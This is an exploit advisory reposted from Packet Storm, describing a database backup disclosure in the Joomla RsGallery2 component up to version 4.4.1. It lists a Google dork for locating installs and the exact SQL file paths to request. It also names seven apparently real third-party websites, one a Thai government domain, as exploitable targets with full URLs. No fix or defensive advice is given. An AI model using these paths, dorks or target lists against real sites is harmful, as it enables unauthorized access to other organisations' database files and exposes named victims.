Joomla RsGallery2 component version 4.4.1 suffers from a database disclosure vulnerability.
eace501c5370136988c212823ecb8b8145a82390e71605f52c00a0d4297dfe9c#################################################################################################
# Exploit Title : Joomla Com_RsGallery2 Components 4.4.1 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 08/12/2018
# Vendor Homepage : rsgallery2.org ~
extensions.joomla.org/extension/rsgallery2/
# Software Download Link : rsgallery2.org/index.php/download
+
github.com/RSGallery2/RSGallery2_Component/releases/download/Version_4.4.1/RSGallery2_Component.4.4.1.zip
+ github.com/RSGallery2/RSGallery2_Component/releases
+
github.com/DimaSamodurov/erasvit/blob/master/administrator/components/com_rsgallery2/sql/rsgallery2.sql
+
github.com/DimaSamodurov/erasvit/tree/master/administrator/components/com_rsgallery2
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.11 ~ 4.4.1 ~ 4.2.101 ~ 4.2.102 ~ 4.2.103 ~ 4.3.0
~
4.3.1 alpha ~ 4.3.1 ~ 4.4.1 alpha + 4.4.1 beta ~ 4.4.1_beta 2
# Exploit Risk : Medium
# Google Dorks : inurl:''/administrator/components/com_rsgallery2/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/administrator
# Exploit :
/administrator/components/com_rsgallery2/sql/rsgallery2.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.10.14_to_1.11.0.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.11.0_to_1.11.1.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.11.10_to_1.11.11.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.11.11_to_1.12.0.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.11.7_to_1.11.8.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.12.1_to_1.12.2.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.12.2_to_1.13.2.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.13.2_to_1.14.0.sql
/administrator/sql/updates/mysql/3.0.0.sql
/administrator/sql/updates/mysql/4.0.0.sql
/administrator/sql/updates/mysql/4.3.0.sql
/administrator/sql/updates/install.mysql.utf8.sql
/administrator/sql/updates/uninstall.mysql.utf8.sql
#################################################################################################
# Example Vulnerable Site =>
[+] itsi.co.id/administrator/components/com_rsgallery2/sql/rsgallery2.sql
[+]
theglen.ca/site/administrator/components/com_rsgallery2/sql/rsgallery2.sql
[+]
airnews.co.za/home/administrator/components/com_rsgallery2/sql/upgrade_1.11.7_to_1.11.8.sql
[+]
osmiebkk.moe.go.th/2-administrator/components/com_rsgallery2/sql/rsgallery2.sql
[+]
bunker.linkbg.com/polifron/site/administrator/components/com_rsgallery2/sql/rsgallery2.sql
[+]
protech-me.com/httpdocs/administrator/components/com_rsgallery2/sql/rsgallery2.sql
[+]
wohnbautreppen.com/treppen/administrator/components/com_rsgallery2/sql/rsgallery2.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed